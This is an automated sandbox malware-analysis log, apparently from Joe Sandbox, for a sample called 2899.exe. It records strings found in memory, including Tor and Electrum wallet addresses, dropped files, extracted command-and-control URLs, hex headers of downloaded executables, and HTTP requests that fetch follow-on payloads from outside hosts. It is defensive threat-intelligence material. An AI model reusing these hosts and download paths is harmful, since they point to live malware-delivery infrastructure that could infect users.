Source: 2899.exe, 00000028.00000002.4506634971.0000000005190000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: 2899.exe, 00000028.00000002.4508468054.000000000E4E8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://databaseupgrade.ruhttp://eir5kdrltavou3c2wgqszfyte3jeg76hphm7fps7b7zhl4pokr5v6mqd.onion

Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	File created: taskhost.exe.23.dr
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	File created: winlog.exe.23.dr
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	File created: msedge.exe.23.dr

Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199560322242
Source: Malware configuration extractor	URLs: https://t.me/cahalgo
Source: Malware configuration extractor	URLs: http://kumbuyartyty.net/
Source: Malware configuration extractor	URLs: http://criogetikfenbut.org/
Source: Malware configuration extractor	URLs: http://stualialuyastrelia.net/
Source: Malware configuration extractor	URLs: http://onualituyrs.org/
Source: Malware configuration extractor	URLs: http://sumagulituyo.org/
Source: Malware configuration extractor	URLs: http://snukerukeutit.org/
Source: Malware configuration extractor	URLs: http://lightseinsteniki.org/
Source: Malware configuration extractor	URLs: http://tyiuiunuewqy.org/
Source: Malware configuration extractor	URLs: http://liuliuoumumy.org/
Source: Malware configuration extractor	URLs: http://tonimiuyaytre.org/
Source: Malware configuration extractor	URLs: http://zexeq.com/raud/get.php
Source: Malware configuration extractor	URLs: 79.137.192.18/9bDc8sQ/index.php
Source: Malware configuration extractor	URLs: 51.255.152.132:36011

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 13 Oct 2023 13:21:00 GMTContent-Type: application/octet-streamContent-Length: 314368Last-Modified: Thu, 12 Oct 2023 19:55:02 GMTConnection: keep-aliveETag: "65284f16-4cc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c3 f5 7d 93 87 94 13 c0 87 94 13 c0 87 94 13 c0 dc fc 10 c1 8a 94 13 c0 dc fc 16 c1 36 94 13 c0 dc fc 17 c1 91 94 13 c0 52 f9 17 c1 95 94 13 c0 52 f9 10 c1 92 94 13 c0 52 f9 16 c1 c8 94 13 c0 dc fc 12 c1 88 94 13 c0 87 94 12 c0 22 94 13 c0 1c fa 1a c1 86 94 13 c0 1c fa ec c0 86 94 13 c0 1c fa 11 c1 86 94 13 c0 52 69 63 68 87 94 13 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 92 f6 cd 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 7a 03 00 00 5e 01 00 00 00 00 00 74 76 01 00 00 10 00 00 00 90 03 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 05 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 82 04 00 64 00 00 00 00 c0 04 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 04 00 84 2f 00 00 80 67 04 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 94 68 04 00 18 00 00 00 f0 67 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 03 00 1c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cf 78 03 00 00 10 00 00 00 7a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e fe 00 00 00 90 03 00 00 00 01 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d0 2b 00 00 00 90 04 00 00 1c 00 00 00 7e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 c0 04 00 00 02 00 00 00 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 84 2f 00 00 00 d0 04 00 00 30 00 00 00 9c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 13 Oct 2023 13:21:10 GMTContent-Type: application/octet-streamContent-Length: 413696Last-Modified: Tue, 10 Oct 2023 11:18:03 GMTConnection: closeETag: "652532eb-65000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 fa a0 76 a1 9b ce 25 a1 9b ce 25 a1 9b ce 25 ce ed 50 25 b2 9b ce 25 ce ed 64 25 cb 9b ce 25 ce ed 65 25 84 9b ce 25 a8 e3 5d 25 a8 9b ce 25 a1 9b cf 25 35 9b ce 25 ce ed 61 25 a0 9b ce 25 ce ed 54 25 a0 9b ce 25 ce ed 53 25 a0 9b ce 25 52 69 63 68 a1 9b ce 25 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d0 e1 37 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 26 05 00 00 5a e5 01 00 00 00 00 fd 4c 00 00 00 10 00 00 00 40 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 ea 01 00 04 00 00 4e fa 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 27 05 00 64 00 00 00 00 50 e9 01 d8 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 37 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 25 05 00 00 10 00 00 00 26 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 e4 e5 e3 01 00 40 05 00 00 3c 00 00 00 2a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 69 78 65 63 69 6c 00 04 00 00 00 30 e9 01 00 04 00 00 00 66 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 61 6b 65 00 00 00 dc 05 00 00 00 40 e9 01 00 06 00 00 00 6a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d8 de 00 00 00 50 e9 01 00 e0 00 00 00 70 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Oct 2023 13:21:15 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 12 Oct 2023 19:13:57 GMTETag: "92000-60789bddc6550"Accept-Ranges: bytesContent-Length: 598016Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 9f 27 38 64 fe 49 6b 64 fe 49 6b 64 fe 49 6b 2f 86 4c 6a 65 fe 49 6b 2f 86 4a 6a 67 fe 49 6b 2f 86 4d 6a 77 fe 49 6b 2f 86 48 6a 75 fe 49 6b 64 fe 48 6b c4 fe 49 6b 2f 86 41 6a 6e fe 49 6b 2f 86 b6 6b 65 fe 49 6b 2f 86 4b 6a 65 fe 49 6b 52 69 63 68 64 fe 49 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 5f d4 7f d9 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 1e 00 80 00 00 00 90 08 00 00 00 00 00 50 11 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 10 00 00 0a 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 09 00 00 10 00 00 c2 cb 09 00 02 00 60 c1 00 00 08 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 a3 00 00 b4 00 00 00 00 f0 00 00 55 24 08 00 00 e0 00 00 44 04 00 00 00 00 00 00 00 00 00 00 00 20 09 00 30 00 00 00 78 9a 00 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 90 00 00 40 01 00 00 00 00 00 00 00 00 00 00 50 91 00 00 20 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b0 7e 00 00 00 10 00 00 00 80 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 20 24 00 00 00 90 00 00 00 30 00 00 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 1f 00 00 00 c0 00 00 00 10 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 44 04 00 00 00 e0 00 00 00 10 00 00 00 d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 55 24 08 00 00 f0 00 00 00 30 08 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 30 00 00 00 00 20 09 00 00 10 00 00 00 10 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Oct 2023 13:21:18 GMTServer: Apache/2.4.37 (Win64) PHP/5.6.40Last-Modified: Mon, 09 Oct 2023 19:50:06 GMTETag: "4ae00-6074de5a4a562"Accept-Ranges: bytesContent-Length: 306688Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 f8 06 6b 72 99 68 38 72 99 68 38 72 99 68 38 cf d6 fe 38 73 99 68 38 6c cb fd 38 6e 99 68 38 6c cb eb 38 fc 99 68 38 55 5f 13 38 7b 99 68 38 72 99 69 38 c9 99 68 38 6c cb ec 38 32 99 68 38 6c cb fc 38 73 99 68 38 6c cb f9 38 73 99 68 38 52 69 63 68 72 99 68 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e d2 b9 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 6a 03 00 00 98 3b 00 00 00 00 00 20 05 01 00 00 10 00 00 00 80 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 3e 00 00 04 00 00 b0 bf 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 68 03 00 64 00 00 00 00 90 3e 00 00 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 b8 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 68 03 00 00 10 00 00 00 6a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a8 ff 3a 00 00 80 03 00 00 0e 01 00 00 6e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6b 69 63 00 00 00 00 05 00 00 00 00 80 3e 00 00 02 00 00 00 7c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 2f 00 00 00 90 3e 00 00 30 00 00 00 7e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.1Date: Fri, 13 Oct 2023 13:22:06 GMTContent-Type: application/octet-streamContent-Length: 132734Connection: keep-aliveKeep-Alive: timeout=20Last-Modified: Fri, 13 Oct 2023 10:47:45 GMTETag: "2067e-60796c965adb6"Accept-Ranges: bytesX-Power-Supply-By: 220 VoltData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 29 81 e9 50 47 d2 e9 50 47 d2 e9 50 47 d2 2a 5f 18 d2 eb 50 47 d2 e9 50 46 d2 49 50 47 d2 2a 5f 1a d2 e6 50 47 d2 bd 73 77 d2 e3 50 47 d2 2e 56 41 d2 e8 50 47 d2 52 69 63 68 e9 50 47 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 22 d7 24 5f 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 66 00 00 00 7c 02 00 00 04 00 00 48 33 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 90 03 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 85 00 00 a0 00 00 00 00 80 03 00 28 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 57 64 00 00 00 10 00 00 00 66 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 80 13 00 00 00 80 00 00 00 14 00 00 00 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 55 02 00 00 a0 00 00 00 06 00 00 00 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 28 0d 00 00 00 80 03 00 00 0e 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: unknown	DNS query: name: iplogger.com
Source: unknown	DNS query: name: iplogger.com

Source: Joe Sandbox View	ASN Name: ATGS-MMD-ASUS ATGS-MMD-ASUS
Source: Joe Sandbox View	ASN Name: OVHFR OVHFR

Source: Joe Sandbox View	IP Address: 34.143.166.163 34.143.166.163
Source: Joe Sandbox View	IP Address: 51.255.152.132 51.255.152.132

Source: global traffic	TCP traffic: 192.168.2.5:49726 -> 51.255.152.132:36011
Source: global traffic	TCP traffic: 192.168.2.5:49744 -> 49.12.118.151:8000

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveAccept: /Referer: http://eifuabdddkpqwuw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: onualituyrs.org
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /tmp/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: alayyadcare.com
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /288c47bbc1871b439df19ff4df68f076.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: montereyclub.org
Source: global traffic	HTTP traffic detected: GET /385119/setup.exe HTTP/1.1Host: hoffmanlevi.spaceConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /55945f02f36a77ce7ed6ee14da31275f/288c47bbc1871b439df19ff4df68f076.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: loveperry.org
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /cahalgo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /minda.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 79.137.192.18
Source: global traffic	HTTP traffic detected: GET /385119/setup.exe HTTP/1.1Host: mikolyda.beget.tech
Source: global traffic	HTTP traffic detected: GET /raud/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
Source: global traffic	HTTP traffic detected: GET /raud/get.php?pid=903E7F261711F85395E5CEFBF4173C54 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
Source: global traffic	HTTP traffic detected: GET /dl/build2.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: colisumy.com
Source: global traffic	HTTP traffic detected: GET /treelatestprores.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 171.22.28.219
Source: global traffic	HTTP traffic detected: GET /files/1/build3.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
Source: global traffic	HTTP traffic detected: GET /d37c48c18c73cc0e155c7e1dfde06db9 HTTP/1.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0 uacqHost: 49.12.118.151:8000
Source: global traffic	HTTP traffic detected: GET /images.zip HTTP/1.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0 uacqHost: 49.12.118.151:8000Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /getfile/taskhost.exe HTTP/1.1Host: 95.214.27.254
Source: global traffic	HTTP traffic detected: GET /getfile/winlog.exe HTTP/1.1Host: 95.214.27.254
Source: global traffic	HTTP traffic detected: GET /getfile/msedge.exe HTTP/1.1Host: 95.214.27.254
Source: global traffic	HTTP traffic detected: GET /192.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: h171008.srv22.test-hf.su

